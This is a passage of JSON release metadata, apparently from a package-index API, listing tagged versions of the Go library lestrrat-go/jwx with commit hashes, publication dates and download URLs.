":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-